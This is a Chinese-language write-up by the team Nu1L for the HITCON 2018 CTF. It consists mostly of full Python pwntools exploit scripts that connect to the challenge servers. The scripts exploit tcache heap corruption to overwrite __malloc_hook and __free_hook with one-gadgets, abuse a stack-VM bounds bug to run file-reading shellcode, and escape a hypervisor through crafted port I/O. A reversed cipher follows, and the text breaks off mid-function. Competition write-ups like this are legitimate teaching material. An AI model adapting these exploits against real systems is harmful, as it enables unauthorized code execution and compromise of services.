HITCON2018-WP-By Nu1L
veneno CTF 11537浏览 · 2018-10-22 07:03

2018 hitcon CTF

By Nu1L

比赛网址:https://ctf2018.hitcon.org/
比赛时间:2018/10/20 02:00 UTC ~ 2018/10/22 02:00 UTC


PWN

children tcache

from pwn import *
#p=process('./child',env={'LD_PRELOAD':'./libc.so.6'})
# Remote instance of the service; the commented process()/LD_PRELOAD line above
# is the local variant.
p = remote(host='54.178.132.125', port=8763)
# The challenge's libc: its symbol table supplies the __malloc_hook offset used below.
libc = ELF(path='./libc.so.6')
def add(size, data):
    """Menu option 1: request a chunk of *size* bytes and send *data* as its contents.

    *data* is sent raw (not line-terminated), so each caller decides whether a
    trailing newline is part of the contents.
    """
    p.sendlineafter('choice', '1')
    p.sendlineafter('Size:', str(size))
    p.sendafter('Data:', data)

def dele(index):
    """Menu option 3: free the chunk kept in slot *index*."""
    p.sendlineafter('choice', '3')
    p.sendlineafter('Index', str(index))

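def show(index):
    """Menu option 2: ask the program to print slot *index*.

    Only the request is sent; the caller reads the reply from ``p``.  Factored
    out so the menu interaction has the same shape as add()/dele().
    """
    p.recvuntil('choice')
    p.sendline('2')
    p.recvuntil("Index:")
    p.sendline(str(index))


# The allocation/free sequence below is order-sensitive and is kept exactly as
# the author wrote it; the trailing numbers are the author's bookkeeping of
# which program slot each allocation lands in.
for i in range(7):
    add(0x80, 'xxx\n')
for i in range(7):
    dele(i)

for i in range(7):
    add(0x110 - 8, 'xxx\n')

add(0x110 - 8, 'aaaa\n')  # 7
add(0x100, 'bbbb\n')  # 8
add(0x100, 'cccc\n')  # 9

for i in range(7):
    dele(i)

dele(8)
dele(7)

for i in range(7):
    add(0x110 - 8, 'aaaa\n')  # 0-6
add(0x110 - 8, 'a' * (0x110 - 8))  # 7: fills the whole request, no newline
for i in range(7):
    dele(i)
for i in range(7):
    add(0x80, '1234567\n')  # 0-6

add(0x80, 'xxxxxxxx\n')  # 8

for i in range(7):
    dele(i)

add(0x60, 'ABCD\n')  # 0

dele(8)
dele(9)
add(0x40, 'a\n')  # 1
add(0x30, 'b\n')  # 2
add(0x500, 'aaaa\n')  # 3
add(0x120, 'bbbb\n')  # 4
# Author's note: slots 0 and 3 refer to the same chunk at this point.
dele(3)

# Print slot 0 and take its first 6 bytes as a pointer into libc.
show(0)
addr = u64(p.recv(6).ljust(8, '\x00'))
# The subtracted value is the distance between that pointer and the libc base as
# seen in the author's debugging session; it is specific to this libc build.
libc_base = addr - (0x00007f2e9c12dca0 - 0x7f2e9bd42000)
info("libc:0x%x", libc_base)
malloc_hook = libc_base + libc.symbols['__malloc_hook']
info("malloc hook:0x%x", malloc_hook)
one = libc_base + 0x10a38c  # libc-build-specific offset
add(0x500, 'aaaaa\n')  # 3
dele(3)
add(0x120, 'ABCDABCD\n')
dele(4)
dele(3)
dele(0)
add(0x120, p64(malloc_hook) + '\n')

add(0x120, p64(one) + '\n')
add(0x120, p64(one) + '\n')

# One more allocation via menu option 1, sent without waiting for the prompts.
p.sendline('1')
p.sendline('304')
p.interactive()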

Groot

指针未初始化

#!/usr/bin/env python2
# coding:utf-8
from pwn import *
import os

VERBOSE = 1         # 1: switch pwntools logging to DEBUG once the tube is open
DEBUG   = 1         # 1: print a gdb attach command and wait for Enter (local runs only)
LOCAL   = 0         # 1: spawn ./groot locally; 0: connect to remote_addr:remote_port

target = 'groot'    # binary name, used for process('./groot') and pidof()
libc   = []         # libc files to LD_PRELOAD for a local run (relative to $PWD)
break_points = []   # addresses handed to gdb as "b *ADDR" when DEBUG is set
remote_addr = '54.238.202.201'
remote_port = 31733

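def hint(break_points=()):
    """Print a ready-to-paste ``gdb attach`` line and wait for Enter (local runs only).

    Args:
        break_points: addresses to pre-set as breakpoints via ``-ex 'b *ADDR'``;
            when non-empty a trailing ``-ex 'c'`` resumes the process after
            attaching.  An immutable default replaces the shared list.

    Does nothing unless the module-level ``LOCAL`` flag is set.
    """
    if LOCAL:
        out = 'gdb attach ' + str(pwnlib.util.proc.pidof(target)[0])
        for bp in break_points:
            out += " -ex 'b *{}'".format(hex(bp))
        # Block until gdb has been attached from another terminal.
        raw_input(out + " -ex 'c'\n" if break_points else out + "\n")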
# if libc:
#     elf = ELF(libc[0])
#     gadget = lambda x: next(elf.search(asm(x, os='linux', arch='amd64')))

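if LOCAL:
    if libc:
        # One colon-separated LD_PRELOAD entry per requested libc.  Assigning
        # inside a loop would keep only the last file.
        os.environ['LD_PRELOAD'] = ':'.join(
            os.environ['PWD'] + '/' + libc_ for libc_ in libc)
    p = process('./' + target)
    if DEBUG:
        # Same gdb attach prompt as hint(); reuse it instead of repeating the code.
        hint(break_points)
else:
    p = remote(remote_addr, remote_port)

if VERBOSE:
    context.log_level = 'DEBUG'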



def mkdir(dir):
    """Create directory *dir* through the target's shell prompt."""
    cmd = 'mkdir ' + dir
    p.sendlineafter('$ ', cmd)

def touch(name):
    """Create an empty file *name* through the target's shell prompt."""
    cmd = 'touch ' + name
    p.sendlineafter('$ ', cmd)

def rm(name):
    """Remove *name* through the target's shell prompt."""
    cmd = 'rm ' + name
    p.sendlineafter('$ ', cmd)

def mkfile(name, content):
    """Create file *name* and answer the ``Content?`` prompt with *content*."""
    exchange = (('$ ', 'mkfile ' + name), ('Content?', content))
    for prompt, reply in exchange:
        p.sendlineafter(prompt, reply)

def cd(dir):
    """Change the current directory to *dir* through the target's shell prompt."""
    cmd = 'cd ' + dir
    p.sendlineafter('$ ', cmd)

def ls(dir):
    """List *dir* through the target's shell prompt; an empty *dir* sends a bare ``ls``."""
    cmd = 'ls ' + dir if dir else 'ls'
    p.sendlineafter('$ ', cmd)

def mv(src, dst):
    """Rename *src* to *dst* through the target's shell prompt."""
    cmd = 'mv {} {}'.format(src, dst)
    p.sendlineafter('$ ', cmd)

def exp(cmd=None):
    """Drive the remote ``groot`` shell through the steps described in the write-up.

    Args:
        cmd: accepted for the ``exp("id")`` call at the bottom of the file but
            not used anywhere in the function.

    The command sequence is order-sensitive: two ``ls`` listings are parsed for
    a heap pointer and a libc pointer (``heap``, ``libc``), and later commands
    embed addresses derived from them.  The numeric constants (76864, 0x789ca0,
    7911656, ...) are offsets the author observed for this binary/libc build and
    are not portable.
    """

    mkdir('A'*0x30)
    cd('A'*0x30)
    touch('B'*0x30)
    cd('..')
    rm('A'*0x30)
    touch('X')
    touch('C'*0x30)
    rm('X')
    ls('')
    # The listing exposes a 6-byte heap pointer after a 0x14-byte prefix.
    p.recv(0x14)
    heap = u64(p.recv(6).ljust(8,'\x00'))
    print hex(heap)
    heap_base = heap - 76864
    print hex(heap_base)

    rm(p64(heap))
    # The first six bytes of an address are used as the path argument.
    ls(p64(heap_base+0x11fd0)[:-2])
    for i in range(4):
        ls('HEHE')
    ls('A'*8+p16(0x561))
    rm('/etc/passwd')
    ls('/')
    ls('/')
    ls('/')
    # Second leak: a libc pointer 0x10 bytes after the text 'dev' in the listing.
    # Note: this local ``libc`` shadows the module-level list of the same name.
    p.recvuntil('dev')
    p.recv(0x10)
    libc = u64(p.recv(6).ljust(8,'\x00'))
    print hex(libc)
    libc_base = libc - 0x789ca0
    print hex(libc_base)

    for i in range(2):
        ls('D'*0x30)
    rm('/dev')

    # add bin sh
    # ls('')
    mv('HEHE','sh')
    # mv('/bin/id','/bin/sh')
    # cd('../../../../../../../../../../../bin')

    for i in range(9):
        ls('D'*0x60)
    # ls('E'*0x40)
    # ls('E'*0x40)
    rm('/boot')

    ls('E'*0x40)

    # Offsets relative to the leaked libc base (specific to the target's libc
    # build); malloc_hook is computed but not used further down.
    free_hook = 7911656 + libc_base
    malloc_hook = 0x789c30 + libc_base
    magic = 0x4f440 + libc_base + 3792896
    ls('X'*0x40+p64(heap_base+0x50-0x28))
    ls('D'*0x30)
    # ls(p64(free_hook-0x28)[:-2])

    print hex(magic)
    print hex(free_hook)
    rm('A'*0x28+p64(free_hook))


    # mkdir('../../../../../../../../../../../../../../bin/sh')
    # mv('/bin/id',p64(magic))
    ls(p64(magic))
    # Drain whatever the target prints for one second, then send the final
    # command without waiting for a prompt.
    p.recvrepeat(1)
    p.sendline('rm ' + '../'*8+'home/groot/sh')
    # ls('123')



    # mkdir('ttt')
    # cd('ttt')

    # for i in range(10):
    #     mkdir(str(i)*0x30)
    # mkdir('C'*0x30)
    # cd('C'*0x30)
    # touch('A'*0x30)
    # cd('..')
    # rm('C'*0x30)


    # touch()


    p.interactive()


if __name__ == '__main__':
    exp("id")  # the argument is accepted by exp() but currently ignored

Abyss I

是个堆栈机VM
swap 没有边界检查,可以越界到machine

把machine盖成负数,可以向上写got表
输入中放入shellcode,改shellcode跳过去即可

from pwn import *

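p = remote('35.200.23.198', 31733)
context(arch = 'amd64', os = 'linux')
context.aslr = False  # only affects locally spawned process(); no effect on the remote target
#p = process('./user.elf')
#gdb.attach(p)

#p = process('./hypervisor.elf kernel.bin ld.so.2 ./user.elf'.split(' '))
# Program text for the challenge's stack VM (see the notes above).  The repeat
# count must be an int: floor division keeps the expression valid on Python 3
# as well, where ``/`` yields a float and ``'%' * 26.0`` raises TypeError.
payload = '4294967295\\'
payload += '%' * ((0x2020a0 - 0x202030) // 4 - 2)
payload += '0:'
payload += '1:'
payload += '%%%%1;'
payload += str(0x2030A4 + 0x100 - 0x7b6) + '+'

payload += '0;'
payload += ','
# Pad the VM program to 0x100 bytes, then append machine code that opens the
# file ``flag``, reads it onto the stack and writes it to stdout.
payload = payload.ljust(0x100, '\x01')
payload += asm(shellcraft.amd64.linux.open('flag', 0, 0))
payload += asm(shellcraft.amd64.linux.read(3, 'rsp', 0x100))
payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 0x100))
p.sendline(payload)
p.interactive()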

Abyss II

系统调用号对应的处理函数(大概)

(0, '0x239L') read
(1, '0xa9aL') write
(2, '0x972L') open
(3, '0xf4bL') 
(5, '0x1caL')
(9, '0xc47L')
(10, '0x17b2L')
(11, '0xd54L')
(12, '0xbc6L')
(20, '0xb0dL')
(21, '0xa4cL')
(60, '0x966L')
(158, '0xb87L')
(221, '0x195L')
(231, '0x966L')
(257, '0xa39L')

write_sys 应该可以溢出。。。。试一试
让buf的地址加上size溢出到一个很小的数应该就可以过那个检查
kmalloc很大的数的时候会返回0,看了一下hypervisor似乎image base也是0,大概可以覆盖代码

hypervisor还有个蜜汁验证

已经能成功执行shellcode了,还需要逆一下串口的交互,手写一下open,read和write

from pwn import *
import time
context(arch = 'amd64', os = 'linux')  # target for asm()/shellcraft below
context.aslr = False  # only affects locally spawned process(); no effect on the remote target



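def runshellcode(p, s):
    """Send the stage-1 payload over *p*, then deliver the machine code *s* once it signals readiness.

    Stage 1 is the VM program from Abyss I followed by a stub that writes the
    marker ``aaaa`` (``push 0x61616161``), reads up to 0x1000 bytes onto the
    stack and jumps there; *s* is sent as soon as the marker arrives.  Switches
    pwntools logging to debug afterwards so the exchange with stage 2 is visible.
    """
    payload = '4294967295\\'
    # Floor division keeps the repeat count an int on Python 3 as well.
    payload += '%' * ((0x2020a0 - 0x202030) // 4 - 2)
    payload += '0:'
    payload += '1:'
    payload += '%%%%1;'
    payload += str(0x2030A4 + 0x100 - 0x7b6) + '+'
    payload += '0;'
    payload += ','
    payload = payload.ljust(0x100, '\x01')
    payload += asm('push 0x61616161')
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 0x4))
    payload += asm(shellcraft.amd64.linux.read(0, 'rsp', 0x1000))
    payload += asm('jmp rsp')
    p.sendline(payload)
    p.recvuntil('aaaa')
    p.send(s)
    context.log_level = 'debug'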

def main():
    """Two-stage payload for the Abyss II hypervisor challenge (see the notes above).

    Stage 1 (delivered by runshellcode): map an RWX (prot 7) region at
    ``mmap_addr``, echo the mmap result, read stage 2 into the region, then
    issue a write whose length makes ``mmap_addr + length`` wrap around 2**64 to
    0x300000 -- the overflow the notes describe for passing the length check.
    Stage 2 is raw data and code for the guest side: a name, two 3-word
    records, a NOP sled and port I/O; offsets and port numbers are specific to
    this challenge image.
    """
    p = remote('35.200.23.198', 31733)
    #p = process('./user.elf')
    #p = process('./hypervisor.elf kernel.bin ld.so.2 ./user.elf'.split(' '))
    payload = ''

    mmap_addr = 0x500000
    payload += asm(shellcraft.amd64.linux.mmap(mmap_addr, 0x10000, 7, 16, -1, 0))
    # push rax; write(1, rsp, 8): report the address mmap returned.
    payload += asm('push rax')
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 8))
    payload += asm(shellcraft.amd64.linux.read(0, mmap_addr, 0x10000))
    # 2**64 - mmap_addr + 0x300000: buffer + length wraps to 0x300000.
    payload += asm(shellcraft.amd64.linux.write(1, mmap_addr, 0x10000000000000000 - mmap_addr + 0x300000))
    payload += asm('push rax')
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 8))
    runshellcode(p, payload)

    # Give the remote side time to finish stage 1 before stage 2 is sent.
    time.sleep(10)
    # Offset 0: 8-byte name; offset 8 and 0x20: two (3, 0x100, 0x100) /
    # (1, 0x100, 0x100) records.  The values 0, 8, 0x20 written to the ports
    # below match these offsets -- presumably the open/read/write requests the
    # notes mention (fd, buf, len); confirm against the hypervisor.
    payload = 'flag2'.ljust(8, '\x00')
    payload += p64(3) + p64(0x100) + p64(0x100)
    payload += p64(1) + p64(0x100) + p64(0x100)
    # NOP sled (0x90) from the end of the records up to offset 0xa5d + 36.
    payload = payload.ljust(0xa5d, '\x90') + '\x90'*36
    payload += asm('''
    mov dx, 0x8000
    mov eax, 0x0
    ''')
    payload += '\xef\xed'  # raw x86: EF = out dx, eax ; ED = in eax, dx
    payload += asm('''
    mov dx, 0x8001
    mov eax, 0x8
    ''')
    payload += '\xef\xed'
    payload += asm('''
    mov dx, 0x8002
    mov eax, 0x20
    ''')
    payload += '\xef\xed'
    payload += '\xeb\xfe'  # jmp $ : spin forever after the three port writes
    payload = payload.ljust(0xadb, '\x90')
    # jmp rel8 -0x80 at offset 0xadb: from 0xadd back to 0xa5d, the start of the sled.
    payload += '\xeb\x80'
    p.send(payload)
    p.interactive()

if __name__ == '__main__':
    main()  # entry point; main() opens the remote connection itself

Super Hexagon | solved 1, stuck 2 | pzhxbz

第一层

scanf里面似乎有一个溢出,可以覆盖函数指针

Reverse

EOP

感觉是用c++的异常处理机制实现的一个像控制流平坦化的东西。。。。

使用gdb script进行跟踪

# Break at image base 0x8000000 + 0x5620 and log $rax at every hit; per the
# notes above, the logged values give the order in which handlers are called.
b *(0x8000000+0x5620)
python f = open('log','w')
run < test_input
# $ipx is never cleared, so the loop only ends when the inferior exits and
# `continue` errors out.  The log file is left for gdb's Python to flush at exit.
set $ipx=1
while ($ipx)
  python a = hex(gdb.parse_and_eval("$rax"))
  python f.write(a+'\n')
  continue
end

可以拿到程序的调用函数顺序,大致分析之后发现程序大概为3个循环对用户输入进行加密

大致分析后可以发现中间很多代码都是一样的,猜测是一个循环被拆分出来的结果。

于是半猜半蒙的一步一步还原算法 orz

还原之后的算法如下:

from pwn import *

index_table1 = [1448535819,1128528919,3149608817L,134807173,3570665939L,3806473211L,2728570142L,1936927410,3014904308L,757936956,2358043856L,3082270210L,2374833497L,101119117,2324303965L,3166450293L,3334870987L,3486456007L,2593817918L,2863289243L,1296954911,3941258622L,1212708960,3772817536L,774785486,1061104932,3284375988L,336915093,4227576212L,1970658879,4210704413L,3907542533L,3469666638L,791656519,555856463,1600120839,1953771446,3318050105L,3739122733L,1246425883,3924406156L,3048553849L,2004309316,2981184143L,117900548,2913818271L,1347425158,1162152090,4075994776L,3452801980L,1802191188,3368558019L,2526413901L,1717973422,3099086211L,320073617,3267520573L,2459073467L,690572490,2947538404L,3200170254L,960092585,993743570,623234489,4042274275L,1330609508,707409464,4261233945L,2644344890L,3520169900L,3553823959L,2341200340L,3065399179L,33721211,1145370899,2678000449L,3789639945L,1094809452,1819034704,825304876,505323371,454758676,2560101957L,1549570805,589510964,3991785594L,370565614,4244419728L,2240146396L,3974898163L,2391699371L,724289457,1313770733,185304183,2543318468L,1482222851,842161630,1195869153,16904585,2930650221L,3840204662L,2122209864,2442199369L,4160172263L,2021174981,2577006540L,1835906521,2779097114L,2223250005L,3604382376L,4143366510L,1633760426,202146163,2071712823,875866451,1532729329,1280051094,3722249951L,0,421108335,2088554803,2475919922L,2896996118L,252705665,4126522268L,2139073473,1027450463,404253670,606354480,3132802808L,1229556201,2509602495L,1650609752,572704957,976921435,3031747824L,3537042782L,4025441025L,2408554018L,3755969956L,2745392279L,2273796263L,488498585,2610656439L,2307484335L,1515873912,3654908201L,2711738348L,286352618,522153698,4294954594L,2661219016L,1077970661,3705468758L,640071499,1431674361,1397975412,353704732,2812748641L,1566401404,3250655951L,2425417920L,3385453642L,1381144829,2694850149L,3435946549L,741130933,2172752938L,4278075371L,673758531,943204384,387420263,1499012234,67403766,3351766594L,3873854477L,269522275,3
823360626L,1987486925,1010587606,3115957258L,1886408768,3671720923L,2155898275L,168457726,1044307117,2627498419L,3958056183L,3638069408L,909517352,84250239,1785376989,1179021928,808507045,1263207058,1667481553,3688624722L,2256965934L,859024471,437969053,3233866566L,1903272393,1414818928,1852755755,4177054566L,656885442,2290653990L,2189618904L,2492763958L,1616954659,3587569754L,3503322661L,1465325186,538985414,3890718084L,2964370182L,1111625118,2037997388,2105352378,2829637856L,3301219504L,2762234259L,1734852647,235801096,2880152082L,1920129851,3183330300L,3402274488L,218984698,4193860335L,1364320783,4059153514L,1768540719,4109650453L,892688602,471602192,4008618632L,926405537,2054825406,50559730,3621221153L,1701137244,151588620,3857002239L,3419105073L,1751661478,1684323029,2998024317L,4092808977L,3216984199L,2206408529L,303177240,2795950824L,1583225230,2846435689L,1869561506]
index_table2 = [67438343,1346661484,3474112961L,1136470056,1858205430,1427801220,1604730173,4240686525L,3371867806L,1618495560,1593692882,628543696,132669279,2381579782L,895667404,561240023,3190127226L,4173773498L,2808121223L,3460902446L,3932426513L,1548445029,714375553,4106859443L,247054014,2317113689L,1819754817,943073834,3236991120L,4213957346L,3865778200L,2472125604L,1764338089,2648709658L,847942547,269753372,1413573483,1937837068,2714974007L,3985395278L,2005142283,2140013829,2180714255L,2086886749,3607942099L,3730649650L,1292146326,357233908,1805590046,2673257901L,3273509064L,2629563893L,2269691839L,1537423930,1158584472,1009986861,2202908856L,1030275778,2539430819L,2788911208L,3407333062L,2292903662L,3906119334L,156361185,3772295336L,2693322968L,2894582225L,4135519236L,4281263589L,1791291889,1966259388,424017405,3259377447L,3596041276L,2249412688L,3571551115L,1281325433,2494692347L,3450107510L,1337073953,3663213877L,1872369945,2100867762,606945087,2581929245L,3439303065L,2651669058L,134876686,2182502231L,2448364307L,2427780348L,1685933903,3973554593L,180140473,0,828885963,3518980963L,471536917,335103044,3096890058L,3316545656L,2722000751L,1926947811,1886147668,580816783,1091280799,3528604475L,536235341,1470903091,3674462938L,1403597876,2336732854L,1657733119,112439472,468929098,2517060684L,4201647373L,447260069,1629726631,1831644846,1203253039,3145437842L,2989126515L,2963064004L,1048943258,1361019779,3850780736L,4039947444L,2515145748L,3719326314L,1994384612,2942994825L,2922473062L,4269083146L,1189331136,3504639116L,1481532002,600137824,915379348,1724643576,673330742,1004237426,3918088521L,1494584717,3249241983L,2034087349,1737496343,2827146966L,981507485,4254618194L,4120009820L,3304429463L,2876214926L,2060512749,3382800753L,2449623883L,2605951658L,2360338921L,2127948522,199710294,2849585465L,3741769181L,1670713360,3029976003L,1071543669,4013619705L,1561365130,647727240,3878746103L,2855559521L,735014510,1146451831,1270294054,2072707586,45529015,1213890174,8092
47780,336665371,2760761311L,2741338240L,3839733679L,514695842,781289094,402408259,1224839569,3163803085L,1899477947,1752319558,2982619947L,2158026976L,202311945,380087468,2314273025L,1697030304,3706422661L,2916892222L,65886296,3117229349L,2562650866L,2403512753L,312650667,1391647707,3077872539L,876159779,4053228379L,3049401388L,1323945678,1526257109,539506744,801794409,2782277680L,1122420679,740766001,666920807,22802415,90106088,869366908,3326287904L,3393988905L,1079013488,290452467,3946839806L,4187837781L,2225465319L,3999340054L,1459084508,3783477063L,3212744085L,2248017928L,3340292047L,4068082435L,3585762404L,3811963120L,763158238,404623890,1953059667,1257032137,3639509634L,2384027230L,3122691453L,695851481,2584233285L,963495365,3652545901L,490797818,3056563316L,936672123,2019973722,3798867743L,4079086828L,4146392043L,3184009762L,3010567324L,3540636884L,266490193,223667942]
index_table3 = [3188637369L,582820552,701114700,4220844977L,1243302643,2083749073,4237360308L,274927765,1468159766,1029651878,1293897206,3161832498L,1722705457,1730635712,1125598204,1117667853,3815957466L,1443583719,2167046548L,3554136844L,354161947,1167738120,92210574,1059340077,2663948026L,4009881435L,446503648,2026207406,1941074730,3213344584L,3251618066L,1097613687,1586388505,607134780,3104487868L,3832997087L,83231871,2953228467L,1872916286,1612931269,1331974013,3884246949L,2345962465L,2469565322L,675489981,3492139126L,3095640141L,1442403741,3062609479L,3368273949L,3570652169L,733031367,192351108,1568431459,3377121772L,1542544279,510336671,2284226715L,3892701278L,3426077794L,1883271248,3517763975L,2554697742L,3136862918L,2546243573L,1649959502,1909027233,66192250,1674666943,4246338885L,2109373728,2309982570L,4159174448L,3044652349L,2275903328L,2671877899L,1003633490,1088766086,933312467,3918326191L,3308897645L,384702049,3601389186L,2716639703L,750070978,4120704443L,1792895664,1800694593,2195227374L,3070408630L,2719916717L,3461271273L,234491248,3775521105L,2926423596L,3696680183L,3984256464L,1240025481,1181238898,2833295576L,2691014694L,1205946243,142936318,642459319,1594318824,785264201,3579500024L,151783695,3934186197L,117704453,260116475,496573925,941635624,3858752814L,1051541212,1817209924,2994582072L,2393607791L,109905652,3859670612L,2118680154,2887167143L,1638555956,3643398521L,1916498651,2428539120L,3451702675L,3019158473L,1848340175,1416647788,2143387563,2587794053L,3679640562L,2978984258L,4001951402L,1400132457,558834098,3409038183L,2612501364L,667035462,853422685,2067233748,2629016689L,2761139289L,3529429757L,4284678094L,632890829,1842965941,4095079498L,816132310,3722435846L,1700554059,1214269560,2000975701,824979751,1359958498,3808158251L,2158198885L,2769986984L,1267878658,454302481,3299919004L,1958114351,4070109886L,328274927,4193253690L,967391705,1020673111,345314538,3958893348L,2870127522L,235408906,2035054943,2580322815L,2437517569L,3225862371L,205
9303461,3283403673L,184420981,1324174988,1517836902,3727548028L,3187457475L,2203157279L,1392333464,758918451,41616011,908604962,25756145,4167497931L,0,3144792887L,2461766267L,1967093214,1755736123,2637864320L,3035673804L,4078039887L,3258827368L,470817812,208866433,793194424,2808194851L,3401108118L,2251196049L,4276878911L,2486604943L,534912878,1559583890,1502239004,426711450,1476614381,4196268608L,1284918279,3634419848L,3485978392L,3752124301L,2842274089L,3671841283L,708323894,1142113529,3335243287L,1993176740,903492952,4050317764L,2321386000L,2521667076L,1350979603,1764714954,877868201,2220196890L,303567390,2371456277L,2245821931L,392632208,3975408673L,2362477796L,2744623964L,979057315,4041470005L,3343042534L,4134467265L,417732715,300552548,590619449,3766542496L,2512360830L,2401406878L,1691706554,2862328403L,2800264914L,2912922966L,2951000029L,861352876,3609319283L,549855299]
index_table4 = [3254152897L,164942601,2959793584L,416270104,3784037601L,3834433764L,1757560168,4258422525L,2986054833L,2131031679,4036018416L,3644434905L,1563614813,736295723,398904087,1403689811,528699679,0,3384014025L,2215344004L,759112749,1277807180,3357720008L,1943478643,2539385239L,2491493012L,3634946264L,1303937869,3153435835L,425627161,4132249590L,545110560,2202526083L,1090133312,4120364277L,3072740279L,1657550178,2380244109L,3514577873L,1542390107,2278665351L,2295898248L,1871620975,598171939,2927150510L,3534153938L,475630108,3311412165L,504502302,1917216882,749628716,286987281,3695095260L,4174732024L,1963654773,1373702481,3543638483L,1787408234,1118932802,76958980,2353982860L,3284008131L,3672339162L,989458234,935031095,2324902538L,4261971454L,3257710018L,361584917,821552944,3422054091L,1956362100,2660180638L,1717205094,958608441,454368283,3972614892L,698968361,4074459890L,573974562,828812849,4094070260L,2241478277L,1203145543,2123743102,1341329743,3981968365L,3843922405L,1174214981,2455565714L,3871818470L,878815796,337383444,904979253,2951318703L,138779144,657533991,84345861,786825006,4011037167L,2000776311,2829392552L,3564845012L,222469645,2889045932L,3681696731L,3173532605L,2157787776L,1702929253,244860174,2165076865L,3090106296L,2094935420,3719292125L,2044275065,4232255484L,2252400006L,1678895716,2332195723L,2408855183L,3796963298L,1796793963,712225322,314691346,2699067552L,3756291807L,1601784927,2579739801L,2783413413L,1227804233,4181988345L,3617713367L,3881176039L,2759249316L,1667071075,628801061,4081720307L,1741369703,4001552622L,2789040038L,3341529543L,3227985856L,122459655,1847583342,2867759274L,3441801677L,1628892769,215209740,3043875253L,1424362836,499696413,2479733907L,1126221379,3472843470L,1906094961,1463604823,1264933963,3065447094L,2500879253L,1619502944,1479924312,2195105922L,3927217642L,444880154,4212097531L,1454219094,3759840736L,1047503422,115203846,2303322505L,619444004,2047079034,1097552961,3821029091L,2441490065L,674766888,2639657373L,3
588914901L,1177010758,1817473132,569176865,1349533776,1518225498,3732226014L,648045862,1220511560,2988527538L,3505224400L,908736566,2877276587L,3210990015L,2838778793L,1592264030,851211570,26298625,1073670975,1433879637,951221560,3334142150L,4288269567L,2913083053L,1554224988,38507010,1993352566,2729120418L,3898542056L,996714043,3036450996L,4043409905L,168691722,3480103887L,1879964272,3593512406L,2102355069,194986251,1503957849,3951418603L,64674563,1035303229,1147949124,1257510218,4158412535L,1841641837,2073213819,1379652178,2669570975L,2382725006L,2555575704L,1767076969,3166243516L,858602547,3127170490L,2018009208,3116240569L,2738510755L,1009004604,252251151,2529867926L,2708588961L,3203569854L,3395891146L,796177967,2417452944L,3304155844L,3434410188L,4204710138L,277503248,2630135964L,3922611945L,2609391259L,2585358234L,324044307,1315067982,2813073063L,374833686,3014657715L]

# 32 per-round constants, four per iteration of the loops in en()/de().  Despite
# the name each entry is *added* to the two table outputs and the sum is then
# XORed into a state word.
xor_table = [40806489, 4046542995L, 2337878950L, 3878399079L, 449612036, 776524271, 1059181995, 1764973087, 3196283120L, 4059530435L, 404769168, 416194920, 865505623, 569110855, 4202362994L, 2884025964L, 1364091262, 3967238082L, 3323511658L, 4191090596L, 1977398017, 2934017146L, 619849321, 2598057311L, 2001658147, 3371447456L, 4101937135L, 1132035575, 4142164549L, 95912149, 3823222592L, 1423799602]

# Reads one line from stdin but is never used below; the ciphertext comes from de_flag.
flag = raw_input()

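def to_bytes(d):
    """Return the four bytes of the 32-bit word *d* as ints, least significant first.

    Same order as a little-endian ``p32(d)``.  Uses shifts and masks instead of
    slicing ``hex(d)``: the string route broke on Python 2 ``long`` values below
    0x10000000 (the ``L`` suffix landed inside a two-character slice and
    ``int(..., 16)`` raised) and depended on ``xrange``.
    """
    return [(d >> shift) & 0xff for shift in (0, 8, 16, 24)]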

def ROR(d, n):
    """Rotate the 32-bit value *d* right by *n* bits; the result is masked to 32 bits."""
    mask = 0xffffffff
    rotated = (d >> n) | (d << (32 - n))
    return rotated & mask

def ROL(d, n):
    """Rotate the 32-bit value *d* left by *n* bits; the result is masked to 32 bits."""
    mask = 0xffffffff
    rotated = (d << n) | (d >> (32 - n))
    return rotated & mask

def en(data):
    """Encrypt one 16-byte block *data* (a str) and return the 16-byte result.

    The block is split into four little-endian words t1..t4 (pwntools u32),
    whitened with fixed constants, put through 8 iterations that each consume
    four entries of ``xor_table`` (i, i+1, i+2, i+3), whitened again and
    reassembled in the order t3, t4, t1, t2.  Each iteration first mixes
    (t1, t2) into (t3, t4), then (t3, t4) back into (t1, t2); every updated
    word is rotated by one bit in between.  The per-word lookups XOR one entry
    from each of the four 256-entry tables, the second word of a pair using the
    tables rotated by one.  Recovered by hand from the binary (see the notes
    above); de() is its intended inverse.
    """
    t1 = u32(data[0:4])
    t2 = u32(data[4:8])
    t3 = u32(data[8:12])
    t4 = u32(data[12:16])
    # Input whitening.
    t1 ^= 0x0C01A4D6E
    t2 ^= 0x0A4CB6636
    t3 ^= 0x5B0F5BA1
    t4 ^= 0x2B266926
    #print(hex(t1),hex(t2),hex(t3),hex(t4))
    for i in xrange(0,32,4):
        # First half: (t1, t2) -> (t3, t4).
        tt5 = to_bytes(t1)
        t5 = index_table1[tt5[0]] ^ index_table2[tt5[1]] ^ index_table3[tt5[2]] ^ index_table4[tt5[3]]
        tt6 = to_bytes(t2)
        t6 = index_table2[tt6[0]] ^ index_table3[tt6[1]] ^ index_table4[tt6[2]] ^ index_table1[tt6[3]]
        t3 ^=(xor_table[i] + t5 + t6)%0x100000000
        #print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))
        t3 = ROR(t3,1)
        t4 = ROL(t4,1)
        #print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))
        t4 ^= (xor_table[i+1] + t5 + t6 * 2)%0x100000000
        # Second half: (t3, t4) -> (t1, t2), same shape.
        tt5 = to_bytes(t3)
        t5 = index_table1[tt5[0]] ^ index_table2[tt5[1]] ^ index_table3[tt5[2]] ^ index_table4[tt5[3]]
        tt6 = to_bytes(t4)
        t6 = index_table2[tt6[0]] ^ index_table3[tt6[1]] ^ index_table4[tt6[2]] ^ index_table1[tt6[3]]
        t1 ^= (xor_table[i+2] + t5 + t6)%0x100000000
        t1 = ROR(t1,1)
        t2 = ROL(t2,1)
        t2 ^= (xor_table[i+3] + t5 + t6 * 2)%0x100000000
        # Round trace left in by the author (prints on every iteration).
        print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))

    # Output whitening; the words are emitted in the order t3, t4, t1, t2.
    t3 ^= 0x0EF75CB8F
    t4 ^= 0x0A037222A
    t1 ^= 0x0BA69619A
    t2 ^= 0x60798932
    return p32(t3) + p32(t4) + p32(t1) + p32(t2)

解密算法如下:

def de(data):
    """Decrypt one 16-byte block *data* (a str) produced by en() and return the 16-byte plaintext.

